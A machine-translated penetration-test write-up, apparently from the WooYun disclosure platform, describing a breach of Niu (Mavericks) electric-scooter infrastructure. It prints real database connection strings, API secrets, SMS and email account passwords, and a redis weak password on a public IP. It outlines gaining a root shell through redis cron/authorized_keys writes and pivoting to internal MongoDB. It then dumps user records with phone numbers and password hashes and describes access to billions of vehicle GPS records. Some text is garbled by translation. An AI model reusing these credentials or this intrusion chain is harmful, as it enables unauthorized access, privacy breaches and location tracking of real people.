From redis weak password to mavericks core database

From redis weak password to mavericks core database

The calf is good and can run after charging.
Unfortunately, I did not have such a good car. I had to look at the official website of the Mavericks to stop my thirst. In this process, I found some security problems with a few more clicks and reported them to wooyun.

To make the entire vulnerability report more complete, you can say that some vulnerabilities have been fixed.

1. cms.niu.com File Upload Vulnerability-fixed

Cms.niu.com uses FineCMS. The free version of WooYun: FIneCMS has the vulnerability of unconditional getshell (with poc script). You can directly obtain webshell.
 

The vulnerability has been fixed because it is caused by the vulnerability.

A file, deploywebpm2.json, is found in the/data/xiaoniu/directory by accident. The content is as follows:
 

{  "apps": [    {      "name": "niu-cloud-app",      "script": "./build/bundle/main.js",      "log_date_format": "YYYY-MM-DD",      "exec_mode": "fork_mode",      "env": {        "PORT": 3000,        "MONGO_OPLOG_URL": "mongodb://oplogger:[email protected]:27017/local?authSource=admin",        "MONGO_URL": "mongodb://xiaoniu:[email protected]:27017/niu",        "ROOT_URL": "http://app.cloud.niu.com/",        "KADIRA_APP_ID": "gzBCYpXzpC4ZFN9Qp",        "KADIRA_APP_SECRET": "926b902b-e669-4c74-b12a-eb67dd31e6de",        "NODE_ENV": "production",        "SMS_ACCOUNT_ID": "xiaon",        "SMS_ACCOUNT_PASS": "xiaoniu99",        "CLUSTER_WORKERS_COUNT": "auto"      }    }  ]}

Check that the Code is the database configuration file of the Mavericks app. It is not displayed for the moment. Check the code later.

2. Weak Email Password

Mavericks used 263 of their enterprise mailboxes, and there were two weak passwords in a simple test.
 

[email protected] xiaoniu2015 bingo[email protected] xiaoniu2014 bingo[email protected] xiaoniu2015 bingo[email protected] xiaoniu2015 bingo[email protected] xiaoniu2015 bingo[email protected] xiaoniu2015 bingo[email protected] xiaoniu2015 bingo[email protected] xiaoniu2015 bingo[email protected] xiaoniu2015 bingo[email protected] xiaoniu2015 bingo[email protected] xiaoniu2015 bingo[email protected] xiaoniu2015 bingo[email protected] xiaoniu2014 bingo[email protected] xiaoniu2014 bingo……

Most of the weak passwords xiaoniu2014 xiaoniu2015 are used. Some of the weak passwords in the mailbox can be found in the IP address 123.57.190.83 10.251.200.254

3. Weak redis password 123.57.190.83

This IP Address should also be seen in cms.niu.com, because the cms.niu.com vulnerability has been fixed, so it cannot be confirmed again.

The IP address 123.57.190.83 is open to the redis service and the authentication function is enabled. The test shows that the weak password xiaoniu exists.
 

$ redis-cli -h 123.57.190.83 -a xiaoniu123.57.190.83:6379> echo 1"1"123.57.190.83:6379>

Combined with the defects recently reported by redis, you can directly obtain the server control permissions by backing up the file to authorized_keys or cron.

Using methods in http://zone.wooyun.org/content/23858 posts can bounce shell
 

The permission is root.

4. Weak redis password 10.251.200.254 -- fixed

Through the 123.57.190.83 test on 10.251.200.254, we found that the redis weak password xiaoniu also exists and has been fixed.

In the same way, you can obtain the control permissions of the 10.251.200.254 server. It is found that the server is the database server of the Mavericks user, and the connection account and password of the mongodb database are found on the server.
 

Sh-4.2 # iduid = 0 (root) gid = 0 (root) groups = 0 (root) sh-4.2 # ifconfig eth0eth0: flags = 4163
 
  
Mtu 1500 inet 10.251.200.254 netmask 255.255.248.0 broadcast 10.251.207.255 ether 00: 16: 3e: 00: 0d: 40 txqueuelen 1000 (Ethernet) RX packets 1307284290 bytes 100992745203 (94.0 GiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 1008699098 bytes 70265841719 (65.4 GiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0sh-4.2 # mongo account-u account-pMongoDB shell version: 3.0.6Enter password: connecting to: account> show collectionssystem. indexessystem. profiletesttokensusers> db. users. stats () {"ns": "account. users "," count ": 235961," size ": 125590640," avgObjSize ": 532," numExtents ": 12," storageSize ": 174735360," lastExtentSize ": 50798592, "paddingFactor": 1, "paddingFactorNote": "paddingFactor is unused and unmaintained in 3.0. it remains hard coded to 1.0 for compatibility only. "," userFlags ": 1," capped ": false," nindexes ": 3," totalIndexSize ": 31338608," indexSizes ": {" _ id _ ": 12100480, "phone. number_policemails.address_1 ": 11111184," services. bbs. username_1 ": 8126944}," OK ": 1}> db. users. find (). limit (5) {"_ id": ObjectId ("5600306401d090c64a9f82d4"), "phone": {"number": "18600184498"}, "emails ": [{"address": "", "verified": false}], "createdAt": ISODate ("2015-07-24T12: 47: 43Z"), "services ": {"bbs": {"uid": "41266", "email": "", "phone": "18600184498", "username": "Xin 102 ", "password": "42287674bcd0b523608f57c360000cf", "salt": "feee55", "status": 1}, "qq": {"id": ""}, "weibo ": {"id": ""}, "wechat": {"id": ""}, "password": {"salt": "feee55", "bcrypt ": "42287674bcd0b523608f57c36366cf"}, "phone": {"verify": {"numOfRetries": 1, "check_times": 0, "code": "4836", "phone ": "18600184498", "lastRetry": ISODate ("2015-10-06T06: 04: 51.065Z") }}, "profile" :{}{ "_ id ": objectId ("5623657f058ccda-37bbf908"), "phone": {"number": "13901339198"}, "emails": [], "createdAt": ISODate ("2015-10-18T04: 22: 54.690Z ")," username ":" "," _ v ": 0," services ": {" phone ": {" verify ": {" numOfRetries ": 1, "check_times": 0, "code": "3736", "phone": "13924851930", "lastRetry": ISODate ("2015-10-18T09: 25: 19.991Z ")}}, "password": {"salt": "1057906819760", "bcrypt": "region" }}{ "_ id": ObjectId ("5623659a9cb9935c7dfc3a33"), "phone ": {"number": "15917156004"}, "emails": [], "createdAt": ISODate ("2015-10-18T04: 22: 48.885Z"), "username ":"", "_ v": 0, "services": {"phone": {"verify": {"numOfRetries": 1, "check_times": 0, "code ": "4539", "phone": "15917156004", "lastRetry": ISODate ("2015-10-18T09: 25: 46.624Z") }," password ": {" salt ": "1082386821103", "bcrypt": "Hangzhou" }}{ "_ id": ObjectId ("562365a60b9858937deefe73"), "phone": {"number ": "15051906977"}, "emails": [], "createdAt": ISODate ("2015-10-18T04: 22: 54.547Z"), "username": "", "_ v ": 0, "services": {"phone" :{ "verify": {"numOfRetries": 1, "check_times": 0, "code": "2891 ", "phone": "15051906977", "lastRetry": ISODate ("2015-10-18T09: 25: 58.769Z") }, "password": {"salt": "379527902157 ", "bcrypt": "Hangzhou" }}{ "_ id": ObjectId ("562365ac5effe03537fe8d00"), "phone": {"number": "13924284310 "}, "emails": [{"address": "[email protected]", "_ id": ObjectId ("5623660297c1ab69382b53df"), "verified": false}], "createdAt": ISODate ("2015-10-18T04: 22: 4934772z"), "username": "", "_ v": 0, "services": {"phone ": {"verify": {"numOfRetries": 1, "check_times": 0, "code": "7165", "phone": "13924284310", "lastRetry ": ISODate ("2015-10-18T09: 26: 04.973Z") }," password ": {" salt ":" 1365852077018 "," bcrypt ":" d72e649838b273fbd63c96c6c3479565 "}>
 

There are 23 million users in the database, and the password is encrypted with salt.

5. Connect to the app Database

We have known the connection information of the app database before and found that there are access restrictions, but we can log on through the server 10.251.200.254.
 

sh-4.2# mongo 10.162.196.65:27017/niu -u xiaoniu -pMongoDB shell version: 3.0.6Enter password: connecting to: 10.162.196.65:27017/niu> show collectionscloud_inspectmeteor_accounts_loginServiceConfigurationmeteor_oauth_pendingCredentialsniu_dynamicniu_everydayniu_firmwareniu_gpsniu_gps2niu_infoniu_productniu_pushniu_statusniu_stolenrolessystem.indexessystem.profileusersusers_bakusers_bak2> db.niu_gps.stats(){        "ns" : "niu.niu_gps",        "count" : 2804434191,        "size" : 673064205840,        "avgObjSize" : 240,        "storageSize" : 718919002992,        "numExtents" : 356,        "nindexes" : 1,        "lastExtentSize" : 2146426864,        "paddingFactor" : 1,        "systemFlags" : 0,        "userFlags" : 1,        "totalIndexSize" : 127256496640,        "indexSizes" : {                "_id_" : 127256496640        },        "ok" : 1}>

As a result, the data related to electric vehicles is stored, and niu_gps data is viewed. There are as many as 2.8 billion records.
 

> db.niu_gps.find().limit(1){ "_id" : ObjectId("559a56380cf214e8ec4d4cc0"), "prot_type" : "1", "sn_id" : "N12F471R1274BEKQ", "machine_status" : "E2,A12", "lat" : 31.709278, "lng" : 119.831214, "hdop" : 0, "date" : ISODate("2015-07-06T10:19:36.590Z") }

You can query a record to obtain the sn_id of an electric vehicle and the longitude and latitude of the vehicle supplier at a certain time point. You can obtain the actual geographical location of the Electric Vehicle Based on the longitude and latitude.
 

Based on the data, you can know the location of any electric vehicle, the driving route, and so on.

The above process is only for security testing, without any malicious operations, and the temporary data obtained during the process has been deleted.

Solution:

In fact, the Mavericks pay great attention to security and take the initiative to discover problems and fix and reinforce them. However, we still need to provide several suggestions:

1. Use open-source software to update versions in a timely manner.

2. Fix weak passwords in various areas, such as enterprise mail and redis.